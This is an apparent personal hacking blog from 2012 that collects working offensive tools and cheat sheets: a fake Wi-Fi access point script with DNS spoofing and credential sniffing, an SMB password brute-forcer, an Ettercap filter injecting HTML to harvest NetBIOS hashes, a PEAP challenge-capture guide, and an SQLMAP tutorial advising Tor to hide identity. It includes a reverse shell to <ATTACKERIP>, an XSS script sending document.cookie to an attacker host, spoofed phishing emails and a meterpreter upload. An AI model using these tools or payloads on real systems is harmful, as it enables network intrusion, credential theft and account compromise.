Monday, July 30, 2012

CAPTURE THE FLAG CHALLENGE


Why not have a go at my CTF challenge? No prizes, so just for fun and learning ;)


http://www.mediafire.com/?0t7hffkhbcb1632


There are 10 flags to collect, all of which join together (in flag order) to make up the password to open the final code.

Nothing too difficult, that a bit of googling wouldnt give you, although one of them will depend on the time of day, oh and try not to hog the camera too much eh ;0)

When you have the final code, post it to me below along with your name.


Have fun!

SCRIPTS Fake Wifi Access Point






#!/bin/bash
txtgreen=$(tput setaf 2) # Green
txtrst=$(tput sgr0) # Text reset
clear
echo
echo " ***************************************************"
echo " * *"
echo " * Welcome to *"
echo " * ${txtgreen} The Quick 'n' Evil Access Point${txtrst} *"
echo " * By Sean gambles Nov 2011 v0.11 *"
echo " * *"
echo " ***************************************************"
echo
echo "This tool makes use of the aircrack suite. "
echo "This script will setup a fake access point of your choosing, spoof any"
echo "Access Points that nearby computers are probing for, and then setup DNS "
echo "spoofing and Dsniff to redirect connected clients to your IP address, and"
echo "sniff for clear-text credentials. "
echo "Once the Access Point is up and running, you can utilise other tools"
echo "such as the social engineering toolkit to run alongside this, and either"
echo "capture credentials, or deliver malicous payloads through iframe and java"
echo "applet methods. Ideally, for this script to work, you will need to have "
echo "an alfa wifi card plugged in and a mapped network connection through VMWare,"
echo "preferbly bridged,not NAT'd, as these seem to crash out regularly."
echo
sleep 3
echo
echo "${txtgreen}[*]Please enter the number given to your eth device e.g eth2."
read -p "this can be found by running ifconfig -a :${txtrst}" wired
echo
echo
read -p "${txtgreen}[*]Please enter the number given to your wireless device e.g wlan1 :${txtrst}" wifi
echo
echo
read -p "${txtgreen}[*]Please enter the channel you would like your access point to run on :${txtrst}" channel
echo
echo
read -p "${txtgreen}[*]Please enter the SSID you would like your access point to use :${txtrst}" ssid
echo
echo
echo "${txtgreen}[*]Repairing the issue with the Alfa driver...${txtrst}"
echo
echo "Please be patient, you may ignore any errors here"
rmmod rtl8187
rfkill block all
rfkill unblock all
modprobe rtl8187
rfkill unblock all
echo Bringing $wifi Up
ifconfig $wifi up
ifconfig $wifi down
ifconfig $wifi up
clear
echo
echo
echo "${txtgreen}[*]Setting up the fake access point ${txtrst}"
sleep 2
clear
echo
echo
echo "${txtgreen}[*]cleaning up previous network settings${txtrst}"
ifconfig mitm down
brctl delbr mitm
ifconfig $wired 0.0.0.0 down
ifconfig at0 down
airmon-ng stop mon0
clear
echo
echo
echo "${txtgreen}[*]putting wifi into monitor mode${txtrst}"
airmon-ng start $wifi
sleep 2
clear
echo
echo
echo "${txtgreen}[*]setting the channel on the interfaces${txtrst}"
iwconfig $wifi channel $channel
iwconfig mon0 channel $channel
clear
echo
echo
echo "${txtgreen}[*]Setting up the fake access point on channel $channel ${txtrst}"
xterm -geometry 120x7-0+0 -bg black -fg green -T "airbase-ng" -e /usr/local/sbin/airbase-ng --essid $ssid -P -C 10 -c $channel mon0 &
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Fake Access Point is now running.... ${txtrst}"
sleep 2
clear
echo
echo
echo "${txtgreen}[*]bringing up the at0 interface${txtrst}"
ifconfig at0 up
sleep 5
clear
echo
echo
echo "${txtgreen}[*]Adding the man in the middle bridge${txtrst}"
brctl addbr mitm
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Joining the at0 and eth interfaces to your bridge${txtrst}"
brctl addif mitm $wired
brctl addif mitm at0
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Clearing the ip addresses"
ifconfig $wired 0.0.0.0 up
sleep 2
ifconfig at0 0.0.0.0 up
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Bringing up the new bridge and collecting an ip address${txtrst}"
ifconfig mitm up
dhclient mitm
sleep 5
mitm=$(ifconfig mitm | sed -n '2 p' | awk '{print $2}' |cut -d":" -f2)
clear
echo
echo
echo "${txtgreen}[*]Please enter up to three websites you wish to spoof"
read -p "DNS for e.g *.facebook.com 
www.google.com *.com :${txtrst}" web1 web2 web3
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Starting up Dnsspoof Dsniff and URLsnarf...."
echo $mitm $web1>/tmp/hosts.txt
echo $mitm $web2>>/tmp/hosts.txt
echo $mitm $web3>>/tmp/hosts.txt
sleep 2
clear
echo
echo
echo "${txtgreen}[*]Okay.... all ready to go, have fun! :0) ${txtrst}"
xterm -geometry 120x7-0+200 -bg black -fg green -T "DNSspoof" -e /usr/local/sbin/dnsspoof -f /tmp/hosts.txt -i mitm &
xterm -geometry 120x7-0+350 -bg black -fg green -T "Dsniff" -e /usr/local/sbin/dsniff -i mitm &
xterm -geometry 120x7-0+500 -bg black -fg green -T "URLsnarf" -e /usr/local/sbin/urlsnarf -i mitm &
sleep 12




Domain Password Bruteforcing Tool

#!/bin/sh


echo
echo "*******************************************************"
echo "*                                                     *"
echo "*  Welcome to the Domain Password Bruteforce Tool.    *"
echo "*             By Sean gambles Sep 2010                *"
echo "*******************************************************"
echo
echo "This tool makes use of the nmap smb-enum-users script,"
echo "by basically exporting the results, in a cleaned up form"
echo "into hydra for bruteforcing."
echo
echo "Currently, only working with server 2000, 2003 family."
echo "This is due to server 2008 not allowing unauthenticated"
echo "account enumeration."
echo
echo "*** Please observe account lockout thresholds before"
echo "submitting your password file into this tool, as there"
echo "is no protection against lockouts taking place. ***"
echo
echo "Please enter the target server IP :"
read target
echo "Please enter the path to your password file"
echo "E.g /root/passwords.txt"
read passfile
echo "Enumerating users, please wait...."
nmap -p139,445 -n $target --script=smb-enum-users >/tmp/nmap-users.txt


#Cleans up the user list file by removing template accounts and computer names. and changes the username to lowercase
cat /tmp/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//'|sed -e 's/\(.*\)/\L\1/' >/tmp/users.txt
rm /tmp/nmap-users.txt
echo "Found the following accounts:"
cat /tmp/users.txt
echo "Press any key to start cracking the passwords:"
read continue
echo "Trying passwords against all the user accounts, please wait...."
hydra $target smbnt -s445 -L/tmp/users.txt -P $passfile -t1 -e ns -m D >/tmp/results.txt
rm /tmp/users.txt
echo "*********************************************************"
echo
echo "Domain accounts found :"
echo
cat results.txt |grep login: |cut -d" " -f6-11

Basic Steps of Hacking



INFORMATION GATHERING



  • Harvesting email addresses: - 
    • theharvester.py -d <domain> -l 100 -b google or linkedin  
  • Enumerating Subdomains: - 
    • fierce.pl -dns example.com
    • maltego
    • google - site:example.com -www  
  • IP Ranges: - 
    • whois
    • ipnetinfo.exe
    • reverse host lookups on found subdomains to find extra ranges - for hostname in $(cat subdomains.txt);do host $hostname;done
  • Extracting usernames and other info from metadata: -
    •  metagoofil -d <domain> -l 20 -f all -o output.html -t /tmp
  • Finding vulnerable servers: -

SCANNING

  • Scanning for snmp: -
    • create a list of ip addresses: - for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
    • find vulnerable servers: - onesixtyone -i ips.txt public
  • Netbios info: - nmap -p139 --script nbstat.nse 192.168.1.* |grep user
  • Finding open egress ports: nmap open.zorinaq.com or telnet  open.zorinaq.com <port>

ENUMERATION


  • Enumerating usernames: -
    • from a domain pc: - net users /domain
    • nmap -p445 --script=smb-enum-users <IP> >users.txt
  • Enumerating via snmp: -
    • create a list of ip addresses: - for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
    • find vulnerable servers: - onesixtyone -i ips.txt public
    • enumerate snmp info: - snmpcheck -t <IP> -w
    • Via Metasploit to grab users/groups/computernames: - use auxillary/scanner/smb/smb_lookupsid

    GAINING ACCESS

    • Via a public exploit: - 
      • search exploitdb for code, check headers for compile info i.e. windows.h (windows) or / sys/socket.h (linux), tailor for use then compile.
      • To compile for windows: - either install windows SDK and run cl file.c or within backtrack run root@bt:~/.wine/drive_c/MinGW/bin# wine gcc -o sploit.exe sploit.c -lwsock32
      • To compile for linux: - gcc file.c -o sploit
    • Via password bruteforce: -
      • check out domain account bruteforce tool in september blog post.
      • hydra / medusa are amoungst the best.
    • Via arpspoofing: -
      • 1. uncomment iptables entries in /etc/etter.conf
        2. echo 1 > /proc/sys/net/ipv4/ip_forward
        3. iptables -t nat -A PREROUTING -i <interface> -p tcp --dport 80 -j REDIRECT --to-port 8080
        4. ettercap -i wlan0 -TqM ARP:REMOTE /TARGET1IP/ /TARGET2IP/
        5. sslstrip -a -l 8080 
    • Via a fishing attack: -
      • Setup a metasploit browser exploit generator
        • msfcli auxiliary/server/browser_autopwn lhost=<ATTACKERIP> lport=80 srvhost=<ATTACKERIP> uripath=reports E
        • Spoof an email to the target users with a link to your reports folder:
        • sendemail -t <target_email> -f <spoofed_email> -s <smtp_server> -u <subject>
      • Use metasploit to capture logons
        • use auxiliary/server/capture/http_ntlm set  - set uripath to exchange
        • spoof email to fish users - i.e. "Check out your new outlook web access portal"
      • Use SMB relay
        • Metasploit:  windows/smb/smbrelay- payloads delivered when users connect to \\<ATTACKERIP>\any_fake_share
    • Via Weak SSH Keys: -
      • download weak debian key checker tool from HERE
      • Search for hosts running SSH: nmap -p22 <IPRANGE> --open |grep report |cut -d" " -f5 > ssh-hosts.txt
      • Find vulnerable hosts: for i in $(cat ssh-hosts.txt);do perl dowkd.pl host $i;done
      • Follow the rest of the instructions HERE to exploit.
    • Via Weak Service Permissions: -
    • sc \\<TARGET> create <evilservice> binpath= “cmd.exe /k <EVIL COMMAND> then sc \\<TARGET> start <evilservice>
       
    • Via NFS shares: 
      • showmount -e <IP>
      • mount -t nfs IP:/sharename /tmp/mount
      • to bypass permissions: nfspy -o server=<serverIP>:/<share_name>,hide,allow_other,ro,intr /tmp/mnt
    • Creating wordlists:
      • http://sites.google.com/site/reusablesec/Home/password-cracking-tools/noobify

    WIFI HACKING



    •  WEP:
      • airmon-ng start wlan0
        airodump-ng wlan0
        airodump-ng -w essid -c channel --bssid mac wlan0
        aireplay -1 0 -a bssid -h localmac wlan0
        aireplay -3 -b bssid -h localmac wlan0
        aircrack-ng -n 64 --bssid tgt mac file.cap
        airmon-ng stop wlan0
        /etc/init.d./networking start
        NetworkManager start
        Start-network
      • wesside-ng -i mon0
      • Gerix


      • WPA:
        • airmon-ng start wlan0airodump-ng wlan0
          airodump-ng -w essid -c channel --bssid mac wlan0
          aireplay -0 3 -a <targetmac> -c <client to deauth> wlan0 wait for handshake to be captured when client reconnects.
          aircrack-ng -w passwords.txt -b <targetmac> pskfile.cap or faster way - import cap file into elcomsoft wireless auditor
        • besside-ng
        • Gerix




      • KEY CRACKING

      Capturing and cracking a PEAP challenge/response with FreeRADIUS-WPE

      By Robert Portvliet.

      I figured I would put together a quick post on configuring and using FreeRADIUS-WPE, as lately I’ve seen a few people have issues getting it going on Backtrack 5 R2. To perform a successful attack we’re going to need a couple items, which are the updated FreeRADIUS-WPE package Brad Antoniewicz put together a few months back, and hostapd for our malicious AP. We’re also going to need to put together a .conf file for hostapd to run from.

      After booting into Backtrack, go to http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html, and download freeradius-server-wpe_2.1.11-1_i386.deb.

      To install, type:
      dpkg --install freeradius-server-wpe_2.1.11-1_i386.deb
      Then:
      ldconfig
      Next install hostapd:
      apt-get install hostapd

      Run the FreeRADIUS-WPE setup from the Backtrack menu, which runs the following:
      sh -c "cd /pentest/libs/freeradius-wpe/raddb/certs && ./bootstrap && cp -r * /usr/local/etc/raddb/certs;sudo -s"

      The output should finish up looking something like this:

      Then, we test that FreeRADIUS is working by:
      radiusd -X 

      ("-X" turns on full debugging). It will scroll a bunch of information on the screen, and should end up with the following:

      Next, we need a configuration file for hostapd to run from. Here is one Brad Antoniewicz put together a while ago:
      interface=mon0
      driver=nl80211
      ssid="corporateWIFI"
      logger_stdout=-1
      logger_stdout_level=0
      dump_file=/tmp/hostapd.dump
      ieee8021x=1
      eapol_key_index_workaround=0
      own_ip_addr=127.0.0.1
      auth_server_addr=127.0.0.1
      auth_server_port=1812
      auth_server_shared_secret=testing123
      wpa=1
      channel=1
      wpa_pairwise=TKIP CCMP

      Start a monitor mode interface with:
      airmon-ng start wlan0

      (or in my case wlan1), which will give you the mon0 monitor mode interface.

      Next start hostapd and specify the configuration file:

      Now that we have hostapd and FreeRADIUS-WPE running, connect to the “corporateWIFI” SSID with your test client and input your credentials. You should see activity in your hostapd window at this point, which will look something like this:

      Your client will tell you the login failed (obviously), but if all goes well, when you tail the FreeRADIUS-WPE log, located at /usr/local/var/log/radius/freeradius-server-wpe.log, you’ll see the username, challenge, and response:

      Finally, we can use asleap to attempt to crack the challenge/response.

      Obviously, you are limited strictly to the words in your wordlist when using asleap, but if you want you can feed the challenge/response to John and use its mangling capabilities. Josh Kelley created a neat Python script called radiusWPE2john.py, which I happened upon on pastebin (http://pastebin.com/RJwgbwNh) that takes the FreeRADIUS-WPE log output and converts the challenge/response into a format that John can understand. Here's a copy of it:
      #!/usr/bin/python

      ###############################################################################
      # Free Radius WPE log file convertor to John The Ripper formatted file for
      # password cracking. Use the following format for John:
      # ./john --format=NETNTLM freeradius.john
      #
      # 12/19/2011 - Josh Kelley
      ###############################################################################

      import sys

      if len(sys.argv) < 2:
      print "Please feed me the path to the Free Radius WPE log file"
      exit()

      fileIn = open(sys.argv[1],'r')
      fileOut = open('freeradius.john','w')

      i = 0
      for line in fileIn:
      lineClean = line.strip()
      lineSplit = lineClean.split(':')
      if lineSplit[0] == "mschap":
      i = i + 1
      if lineSplit[0] == "username":
      username = lineSplit[1].strip()
      i = i + 1
      if lineSplit[0] == "challenge":
      challenge = ""
      for x in lineSplit[1:]:
      challenge = challenge + x
      challenge = challenge.strip()
      i = i + 1
      if lineSplit[0] == "response":
      response = ""
      for x in lineSplit[1:]:
      response = response + x
      response = response.strip()
      i = i + 1
      if i == 4:
      lineNew = "%s:$NETNTLM$%s$%s" % (username, challenge, response)
      fileOut.write("%s\n" % lineNew.strip('\n'))
      i = 0
      fileIn.close()
      fileOut.close()


      Run radiusWPE2john.py and point it to the FreeRADIUS-WPE log. It will generate thefreeradius.john file with the challenge/ response converted to the proper formatting for John.

      Then, simply feed John the freeradius.john file. The comments in RadiusWPE2John give the example of using the argument --format=NETNTLM, but John doesn’t seem to find the hashes when given it. It does find them when using no argument though. (YMMV)

      Of course, you can also just pipe the output from John into asleap, as shown below. Make sure to include the dash after the –W switch for asleap. That makes the magic happen. Incidentally, you can do the same thing with CoWPAtty and Aircrack, in both cases putting a dash after the wordlist (-w) parameter let’s you take stdout from John to perform wordlist mangling.

      PLACES TO LEARN

      USEFUL COMMANDS

      • LINUX
      • Grepping multiple strings: egrep -i "string1|string2"  e.g. nmap -sV -p21 10.0.0.* --open |egrep -i "report|open"
      • Creating ip lists: for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
      • Switching to previous directory: cd -
      • Switching to home directory: cd
      • Creating shortcut commands: alias netstat='netstat -antp' or even make up your own commands: i.e. alias makeips='for i in `seq 1 255`;do echo 192.168.1.$i;done'
      • Viewing installed software:
        • Debian based: dpkg --get-selections 
        • RPM based distributions (RHEL, Fedora Core, Cent OS, Suse Linux etc)rpm -qa
      • Searching for Information:
        • find / -name passw*- Search for filenames starting with passw
        • find / | xargs passw - Search for files that contain passw in them.
        • man -k <search_string> (e.g man -k ftp) - will list all man pages that refer to ftp.
      • Reverse netcat shell without netcat:
        • Attacker: nc -lvp 1234
        • Target: mknod backpipe p && telnet <ATTACKERIP> 1234 0<backpipe | /bin/bash 1>backpipe
      • Reverse SSH tunnel:
        • setup ssh: service ssh start && sshd-generate
        • upload plink to target:
        • create reverse tunnel: plink.exe -l root -pw <your ssh pass> -R 3389:127.0.0.1:3389 <attackerIP>  (will map targets rdp port to yours)
        • rdp into yourself to access target: rdesktop 127.0.0.1 -f
          • Finding open egress ports: nmap open.zorinaq.com
        • Open all HTTP hosts on network in firefox: for i in $(nmap -p80 -n 192.168.0.* --open |grep report |cut -d" " -f5);do firefox -new-tab $i;done (have firefox open before running)
        • Simple Web Server: python -m SimpleHTTPServer
        • copying files via scp: scp *.txt <targetip>:

          • WINDOWS
            • quick ping sweep: for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i |findstr TTL

          Using Ettercap to improve NetBIOS attacks



          For those of you that have tried out NetBIOS spoofing, (explained ), you know how devastatingly effective this is on an internal network. There are however, times when good crackable hashes just don't seem to be passing your way. Maybe the network is quiet, or you are just getting NTLMv2 hashes that you just can't seem to crack. If only you could somehow force those XP clients to send over their user's LM hashes...

          Well... it seems you can with Ettercap, and it works very well too.
          One of the great things about Ettercap, is that you can do so much more with man-in-the-middle attacks versus Cain for instance. DNS spoofing, ARP spoofing, iframe injections and many more are possible with this tool. Today though we are going to use a custom filter in an attempt to force the clients, via some HTML injection,  to connect to a fake share on our machine so that we can then harvest their authentication hashes.

          Remember, for this attack to work, you will need to be targetting wired clients on the network (unless they are using open or WEP wifi) as we will be actively changing their traffic, and this would not be possible on a WPA network due to the individual client encryption keys being used.

          First of all you will need to setup metasploit...
          Let's see if we can find some low hanging fruit (XP machines)

          use auxiliary/scanner/smb/smb_version



          Excellent some target XP machines. Make a note of these IP addresses as we will need to target these with Ettercap next.

          Now we need to get out filter configured for Ettercap. As you can see from looking at the filter below, we will be adding in an HTML tag into the web pages that the target will be viewing. This tag will tell the browser that it needs to load an image to display on the page and to load it from a share on your IP.
          The image wont be there, but Metasploit will capture these requests, spoof the challenge, and capture the user's hash.

          Modify the following filter to your own IP address, and save this as netbios.filter.



           if (ip.proto == TCP && tcp.dst == 80) {
             if (search(DATA.data, "Accept-Rubbish!")) {
                replace("Accept-Rubbish!", "Accept-gnidocnE");
                msg("Encoding Taken Care Of...\n");
          }
          }
          if (ip.proto == TCP && tcp.src == 80) {
          replace("head>", "head> <img src=\"
          \\\\192.168.20.10\\pixel.gif\"> ");
          msg("Replacement Filter Ran.\n");
          }



          Next, we need to install Ettercap: apt-get install ettercap
          then within the /usr/local/share/ettercap folder, run etterfilter /root/netbios.filter -o netbios.ef.
          This will complile the filter into a format Ettercap can understand.

          We now need to return to Metasploit and setup the netbios spoofing modules to be ready to capture the incoming hashes, you can use the following resource script to save time:


          use auxiliary/server/capture/smb
          set srvhost 192.168.20.10
          set cainpwfile /tmp/cain
          set johnpwfile /tmp/john
          run
          use auxiliary/server/capture/http_ntlm
          set srvhost 192.168.20.10
          set cainpwfile /tmp/cain
          set johnpwfile /tmp/john
          set uripath /share
          set srvport 80
          run
          use auxiliary/spoof/nbns/nbns_response
          set spoofip 192.168.20.10
          run


          Once you have this running, we can now start ettercap:

          ettercap -TqF netbios.ef -M arp:remote /192.168.20.26,29,30/ /<gatewayIP>/ -i eth0

          This will fire up Ettercap in text mode (T) without verbose info (q) and with the netbios filter (F) using the arp spoofing method (M) against the 3 XP clients.

          Once the users on these clients start browsing web pages, you should see a flurry of hashes coming your way :0)

          Remember to press "q" once you have these hashes so that Ettercap will re-poison them to prevent any network drop-out.



          Make sure you have permission first, and have fun folks!

          WEB HACKING



          • All in on web tool:- http://yehg.net/lab/pr0js/misc/wsa.php?q
          • Via XSS:-
            • Exploiting the browser:-
              • setup metasploit auxiliary/server/browser_autopwn to listen for connection
              • post an IFrame tag on vulnerable site: <iframe SRC="http://ATTACKERIP/URIPATH" height = "0" width ="0">
            • Stealing Session cookies:- 
              • setup a netcat listener: nc -lvp80
              • Steal session cookies with the following: <script> new Image().src="http://ATTACKERIP/bogus.php?output="+document.cookie; </script> 
            •  Bypassing Filters:- 


            • Via SQL Injection:-
              • Via GET
              • show databases: ./sqlmap -u http://www.example.com/index.php?id=1 --dbs
              • show tables: ./sqlmap -u http://www.example.com/index.php?id=1 -D <database> --tables
              • show data: ./sqlmap -u http://www.example.com/index.php?id=1 --D <database_name> -T <table_name> --dump
              • Via POST
              • show databases: ./sqlmap -u http://www.example.com/logon.asp --data "user=&pass=&submit=" --dbs
              • Via WEBDAV:-
                • Download and run ryan linn's webdav test from here
                • create a payload in an allowed format ie php: msfpayload php/meterpreter/reverse_tcp LHOST=ATTACKERIP R | msfencode -o meterpreter.php
                • start a metasploit reverse handler
                • upload the malicious payload to the target server via ftp,ssh,php,webdav (dave),rfi etc.
                • browse to the file http://target/meterpreter.php

              SQLMAP For Beginners





              Requirements
              1. Tutorial Introduction
              1.2 Disclaimer

              2. Setting up for the tutorial
              2.1 Proxychains
              2.2 TOR

              3. Information Gathering

              4. Basic SQLMAP Introduction
              4.1 Fingerprinting
              4.2 Using SQLMAP to creat a dump.
              4.3 --Level and --Risk.

              5. Output variations
              5.1 --Schema and --Column
              5.2 Other variations

              6. Change Log
              Todo:
              1. Add Tips&Tricks along with other useful settings.
              2. Add POST attacks using cookies and --data
              3. Actually learn the --os-x commands and find a red-line how its done.
              4. How to use google dorks inside SQLMAP
              5. File uploading to the back-end database/server
              Requirements

              Recommended OS: Backtrack5 R1
              SQLMAP 1.0-dev (r4690)
              Metasploit (optional)
              Proxychains (optional)
              TOR (optional)

              1. Tutorial Introduction

              This tutorial is made for explaining the usage of SQLMAP for beginners. I do know there is something called documentation (you know that -h option?), but honestly: How much wouldn't you pay to have a nice tutorial explaining how the different options relate to one another for every program there is? People will argue that skids read this to do fucked up things on the Internet and help on their epeen-ego, i am just going to state that if skids manage to run sqlmap in a cmd (windows) or terminal (linux) they should be capable of learning this no matter what, which it why i am not explaining how to run Backtrack or any other linux distro, and tell them what to write in the CMD/Terminal....THAT would be helping skids.
              Some shit about myself:
              - My nick is Matrix you can mainly find me on anonops or other random irc as TheAnonMatrix.
              - I do got a social life.
              - My age is as irrelevant.
              - Take the red pill.
              - Simple python programmer.
              - I hate retarded questions...i mean retarded, not clever ones.
              - I play guitar.
              - I got a weird sense of humor.
              - I don’t know everything, and would never ever claim to do.

              Now, i do consider myself a hacker for one sole reason, if you do manage to get a certain level of access to a place/system you shouldn't have, you are by my definition a hacker. Skids are just those retarded people who learn shit to show epeen and argue on what a hacker is.
              Now, i do hope you enjoy my tutorial on SQLMap and care to add a comment on how much you love me if you find this interesting :)
              Sharing is caring, the only thing i requires is source to lead back to this site and credits to me as i work my ass off to figure these things and explain them.

              Happy Hacking!

              1.2 Disclaimer
              I do not take any responsibility for what retarded people might manage with the information i write or state in this tutorial. This program was not meant to be used for illegal activities, but a tool to check for vulnerabilities on your own website. Never use this tool or any other tools on a website you do not own. I am serious.


              2. Setting up for the tutorial


              So, to hide your ass i recommend two solutions. Proxychains or setting up TOR. Both uses the TOR proxy but got a variation in use. I am assuming you are using Backtrack 5 R1, thus i can skip some explanations. I do recommend using the --random-agent switch in SQLMAP, else you can see the user agent contains SQLMAP, that is not a clever idea.

              2.1 Proxychains


              Proxychains is simple in the use, as we can state what ever we wanna do after the program name. However, it does post a line for every connection we make. Using SQLMap this can pretty much cover the terminal with information you honestly don't need that much. So i prefer to remove it.


              Open it, scroll down to and find quiet_mode, and make sure that line do not have a “#”. Fixed and ready to go!


              2.2 TOR
              (Because of some reports of TOR being fucked with SQLMAP, run --TOR-Check to verify it works and use at own risk. I however recommend using proxychains.)

              First find /etc/apt/sources.list open it and add

              deb http://deb.torproject.org/torproject.org lucid main

              Open the terminal and use this commands:

              gpg --keyserver keys.gnupg.net --recv 886DDD89
              gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

              More commands ran as root:

              apt-get update
              apt-get install tor tor-geoipdb
              apt-get install polipo

              Start tor:
              /etc/init.d/tor start

              Grab the copy of this config file:

              New link: http://www.pc-freak.net/files/polipo.conf

              Go to /etc/polipoconfig and replace the file with the one above. restart polipo:
              /etc/init.d/polipo restart
              Congratz! now you can run SQLMAP with TOR by using the --TOR option!








              3. Information Gathering

              Finding a SQL Vulnerability is as easy as it can get. Imagen we got this URL:

              http://localhost/index.php?id=1337

              An SQL Injection is basically hoping the designer of the page was dumb enough to let something slip. Adding the sign ‘ behind the id variable in the url would send an invalid request into the SQL Database, and send back an error. How this error is handled might return us an error message on the website, this is what we want to see and what the admin want to hide.

              http://localhost/index.php?id=1337’

              Lets say we got lucky and found a vulnerability on this site. The error message could be displayed like this somewhere on the site:

              You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by Sort DESC Limit 0,12' at line 1

              Sometimes even a change in the page would be enough. As long as it’s not a 404 error, then you are doing it right.
              Finding these kinds of URL’s can be done in many ways, one way could be using google. Yes, google.
              Type this into search:

              inurl:index.php?id=

              This would display pages only if they contain that in their URL, or somewhere on their webpage. There are tons of dorks, so you should find a list (http://pastebin.com/dfVwSDpN) and start googling your way!

              Acunetix got an online webpage where you can test SQL injection. I challenge you to find the vulnerability, and use it as the test page during this tutorial!
              http://testasp.vulnweb.com/



              4. Basic SQLMAP Introduction

              4.1 Fingerprinting


              -u The URL input  
              --Fingerprint arg flag telling SQLMAP to do a fingerprint  
              --Tor tells SQLMAP we want to use a TOR proxy  
              --Random-Agent tells SQLMAP we want to have a random selected agent in the header  
              --Threads Value: (1) - 10. Adds multiple threads. Basically speeds up SQLMAP.



              Doing a fingerprint on a website helps you determin what kind of back-end system the website is running. Database system operating system and application technology. Please note that SQLMAP already will start looking for vulnerabilities in the page to fetch the information.
              This could be our result:

              4.2 Using SQLMAP to create a dump.



              --DBS Fetches the available databases.  
              -D Selects one the listed databases  
              --Tables Fetches the tables in the Database if specified with -D, if not; dump all the tables. If a Database have been used before, it will use that database.  
              -T Fetches the entries inside the given table. Requires -D and --Dump  
              --Dump Dumps the given table, specified with -T  
              --Dump-all Dumps everything inside -D, if its not specified it will dump everything.





              Now lets start getting serious! We have fingerprinted the server, finding the vulnerability in the process. Typing the above information should give us a result of databases. In our tutorial we will assume the system database information_schema is present. In theory, it could be everything from admin accounts to user information and forums posts.



              As you can see, we got 2 databases (one is masked out for security reasons *cough*). information_schema is the one we want today! We now want to get the tables inside information_schema. This is done using the --tables option. Remember it does not matter where the options are placed in this case. -D can be in front of --tables and vica versa.
              More talk later on the argument line up and the way everything is processed later.


              As you can see above we got the tables inside the database information_schema. Nothing to interesting, but i guess we wanna see closer on the table “VIEW”. Thus we select the database (-D information_schema) and the table we wanna see (-T VIEWS). using -T we need to add a option telling SQLMAP we wanna dump it all to a text file, thus we use --dump.

              and the result:

              Note: i did cancel the dump because of the null values, there is nothing there.

              Now, if we wanna skip doing all this shit and just get right to the dumping we could just use the --dump-all option and dump everything as it comes in order.




              This sums up the basics of SQLMAP dumping and now we will progress with some of the other options inside SQLMAP, for a better understanding how we can do injections and dumping even better.






              4.3 --Level and --Risk.
              SQLMAP detects a lot of the common vulnerabilities by using the guide above. But what is you KNOW there is an vulnerability there, and SQLMAP is not detecting it? Thus the --Level and --Risk switch should be used. using the --Level and --Risk switch the more “noise” you will be creating therefor if you actually apply these switches you should be behind proxy or VPN for safety.



              --Level Value: 1 to 5 (Default: 1)  
              --Risk Value: 0 to 3 (Default 1)

              Note: I had used --dbms=mysql and --level/risk is sat to 5 (habit, not really necessary)

              5. Output variations

              5.1 --Schema and --Column
              --schema and--column are two commands that will help you to fetch the actual value for every field in the selected table. --schema will fetch the column info for the whole database. --column will only fetch for the given table.


              NOTE --schema: Does not need to be given a table input as we fetch all the column info for the given database with this input


              NOTE--column: Notice we specify a table when using --column.

              If we use --column and define tables (-T) as VIEWS we would end up with this:



              With --schema we would end up with the same result, but for every table in the database. But how does this help us?
              Imagen we got a table named “admin”, we could use --column to view this and see what information we can get. What about a larger table like “User_credentials”? We could see the information and select the fields we wanna dump! In other words, we could skip the unusable primary key values and number of posts, and instead only select the username, password and mail columns in the table.
              In this example we will select the columns CHECK_OPTION and TABLE_NAME. Note they are splitted using a comma, this applies to all places in SQLMAP where we can select more than one database (-D) or table (-T).


              Our command line arg. Notice there is no space between CHECK_OPTION and TABLE_NAME






              And this is our result! Imagen the possibilities by selecting the columns we want to get dumped!

              5.2 Other variations
              By using --dump and -C we could tell SQLMAP to only look for columns we want, and it will search for it inn all available databases. Say you want the columns user and password, and got 20 databases...this will make the search less time consuming.












              6. Change Log

              12.02.2012
              Revision 1 done. Needs to be filled out and small parts to be added. Should work as a tutorial for beginners now!

              11.02.2012
              Written the section about Information gathering and Basic SQLMAP Introduction.

              10.02.2012
              Written tutorial introduction and disclaimer. Starting up with Proxychains and TOR setup.

              08.02.2012
              Document launched. Menu done and text to be done.